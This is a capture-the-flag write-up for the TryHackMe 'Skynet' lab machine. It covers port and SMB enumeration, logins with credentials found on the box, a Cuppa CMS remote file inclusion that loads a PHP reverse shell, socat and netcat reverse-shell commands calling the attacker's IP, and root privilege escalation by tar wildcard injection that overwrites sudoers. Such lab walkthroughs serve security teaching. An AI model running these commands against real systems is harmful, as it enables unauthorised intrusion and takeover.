SKYNET THM{}
IP: 10.10.182.131 Using Hacktricks to find information, this is the followed procedure:
NMAP
nmap -A -sC -T4 10.10.182.131
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-21 03:59 EDT
Nmap scan report for 10.10.182.131
Host is up (0.080s latency).
Not shown: 994 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES SASL AUTH-RESP-CODE CAPA UIDL PIPELINING TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: have capabilities more listed SASL-IR Pre-login IMAP4rev1 post-login IDLE LOGINDISABLEDA0001 ID ENABLE LOGIN-REFERRALS LITERAL+ OK
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h39m59s, deviation: 2h53m12s, median: 0s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-time:
| date: 2022-03-21T07:59:35
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-03-21T02:59:35-05:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds
We find interesting, a webpage and a smb service.
SMB
Enumeration
enum4linux -a 10.10.182.131
=====================================================
| Enumerating Workgroup/Domain on 10.10.182.131 |
=====================================================
[+] Got domain/workgroup name: WORKGROUP
=============================================
| Nbtstat Information for 10.10.182.131 |
=============================================
Looking up status of 10.10.182.131
SKYNET <00> - B <ACTIVE> Workstation Service
SKYNET <03> - B <ACTIVE> Messenger Service
SKYNET <20> - B <ACTIVE> File Server Service
..__MSBROWSE__. <01> - <GROUP> B <ACTIVE> Master Browser
WORKGROUP <00> - <GROUP> B <ACTIVE> Domain/Workgroup Name
WORKGROUP <1d> - B <ACTIVE> Master Browser
WORKGROUP <1e> - <GROUP> B <ACTIVE> Browser Service Elections
MAC Address = 00-00-00-00-00-00
=======================================
| OS information on 10.10.182.131 |
=======================================
Use of uninitialized value $os_info in concatenation (.) or string at ./enum4linux.pl line 464.
[+] Got OS info for 10.10.182.131 from smbclient:
[+] Got OS info for 10.10.182.131 from srvinfo:
SKYNET Wk Sv PrQ Unx NT SNT skynet server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
==============================
| Users on 10.10.182.131 |
==============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
==========================================
| Share Enumeration on 10.10.182.131 |
==========================================
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
[+] Attempting to map shares on 10.10.182.131
//10.10.182.131/print$ Mapping: DENIED, Listing: N/A
//10.10.182.131/anonymous Mapping: OK, Listing: OK
//10.10.182.131/milesdyson Mapping: DENIED, Listing: N/A
//10.10.182.131/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
The sare enumeration is very interesting, lets try connect to any shared folder.
Connect to the anonymous share
smbclient -U '%' -N \\\\10.10.182.131\\anonymous
smb: \> dir
. D 0 Thu Nov 26 11:04:00 2020
.. D 0 Tue Sep 17 03:20:17 2019
attention.txt N 163 Tue Sep 17 23:04:59 2019
logs D 0 Wed Sep 18 00:42:16 2019
We obtained a file called log1.txt with different passwords. Lets try them on the webpage with the user milesdyson.
Webpage
Gobuster
gobuster dir -u http://10.10.182.131 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.182.131
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/21 04:13:57 Starting gobuster in directory enumeration mode
===============================================================
/admin (Status: 301) [Size: 314] [--> http://10.10.182.131/admin/]
/css (Status: 301) [Size: 312] [--> http://10.10.182.131/css/]
/js (Status: 301) [Size: 311] [--> http://10.10.182.131/js/]
/config (Status: 301) [Size: 315] [--> http://10.10.182.131/config/]
/ai (Status: 301) [Size: 311] [--> http://10.10.182.131/ai/]
/squirrelmail (Status: 301) [Size: 321] [--> http://10.10.182.131/squirrelmail/]
After trying the different folders, it's possible to visit /squirrelmail. We can try the above credentials with the username milesdyson here.
Squirrelmail
<IP>/squirrelmail
user: milesdyson
pass: cyborg007haloterminator
Subject: Samba Password reset
From: skynet@skynet
Date: Tue, September 17, 2019 10:10 pm
Priority: Normal
Options: View Full Header | View Printable Version | Download this as a file
We have changed your smb password after system malfunction.
Password: )s{A&2Z=F^n_E.B`
So now we can try this password in the /milesdyson share.
milesdyson share
smbclient -U 'milesdyson' \\\\10.10.182.131\\milesdyson
We are prompted for the password.
smb: \notes\> dir
. D 0 Tue Sep 17 05:18:40 2019
.. D 0 Tue Sep 17 05:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 05:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 05:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 05:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 05:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 05:01:29 2019
important.txt N 117 Tue Sep 17 05:18:39 2019
Tere is a file called important.txt with a secret folder in the webserver.
└─$ cat important.txt
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Gobuster with new page
We do gobuster over the hidden directory.
gobuster dir -u http://10.10.247.90/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt 2 ⨯
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.247.90/45kra24zxs28v3yd/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2022/03/21 09:46:30 Starting gobuster in directory enumeration mode
===============================================================
/administrator (Status: 301) [Size: 337] [--> http://10.10.247.90/45kra24zxs28v3yd/administrator/
Cuppa CMS
After finding this CMS version, an exploit for RFI is founded on exploit db.
On the local machine, we start a python server with the Pestentmonkey php script.
python3 -m http.server 8000
And also a listened with the local IP and the port preconfigured in the payload.
nc -lvnp 5555
Now we use that in our browser
http://10.10.85.87/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.18.13.133:8000/shell.php
And we obtain the shell
Improve shell
- Improve shell with python pty module
python -c 'import pty; pty.spawn("/bin/bash")' - Improve shell with socat
2.1 Download socat and serve on a python server on the local machine
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat2.2 Create a listening conexion on our local machinesocat file:tty,raw,echo=0 tcp-listen:44442.3 execute it on the remote machinewget http://10.11.62.63:8000/socat -O /tmp/socat; chmod +x /tmp/socat; ./tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.11.62.63:4444
Linpeas
- Download linpeas.sh on local machine
wget https://github.com/carlospolop/PEASS-ng/releases/download/20220320/linpeas.sh - Serve it on the python server and download it on the remote machine
- After using linpeas, we found a cronjob with tar
*/1 * * * * root /home/milesdyson/backups/backup.sh
Now we read de backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
So, taking into account the Wildcards of tar, we can exploit it. We can use this command
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.62.63 6666 >/tmp/f" > shell.sh touch "/var/www/html/--checkpoint-action=exec=sh shell.sh" touch "/var/www/html/--checkpoint=1"
There is more information about tar wildcards here Exploiting wildcards on Linux
And do the following
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
And now we are able to do sudo cat /root/root.txt.